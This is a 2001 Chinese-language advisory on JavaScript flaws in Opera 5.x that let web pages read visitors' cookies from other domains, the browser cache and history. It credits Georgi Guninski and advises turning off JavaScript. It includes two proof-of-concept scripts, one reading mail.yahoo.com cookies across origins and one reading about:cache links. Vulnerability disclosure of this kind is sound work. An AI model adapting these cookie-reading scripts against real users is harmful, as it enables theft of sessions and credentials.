Opera 浏览器中存在多个JAVASCRIPT漏洞发布时间:2001-11-16 更新时间:2001-11-16 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Opera 5.12/Windows, Opera 5.0/Linux详细描述 Opera 是多平台WEB浏览器,其中存在多个JAVASCRIPT漏洞。 可能导致WEB站点上的脚本访问浏览者COOLIE信息和连接到任意域中。也可能导致脚本读取浏览者的CACHE和历史记录等信息。某些CACHE,COOKIE或者历史记录中存在用户名/密码敏感信息。 测试代码 -1.---------------------------------- a=window.open("http://mail.yahoo.com"); function f() { xx=a.document.cookie; alert("hi"+xx); a.document.open(); a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>"); a.document.close(); } setTimeout("f()",5000); ----------------------------------- -2.-------------------------------- a=window.open("about:cache"); function f() { xx=a.document.links[2]; alert("hi="+xx); } setTimeout("f()",5000); ----------------------------------- 另外一个测试页面如下所示: http://www.guninski.com/hotjava1-desc.html 解决方案 关闭JAVASCRIPT。 相关信息 Georgi Guninski (guninski@guninski.com) 参考:http://www.guninski.com/ |
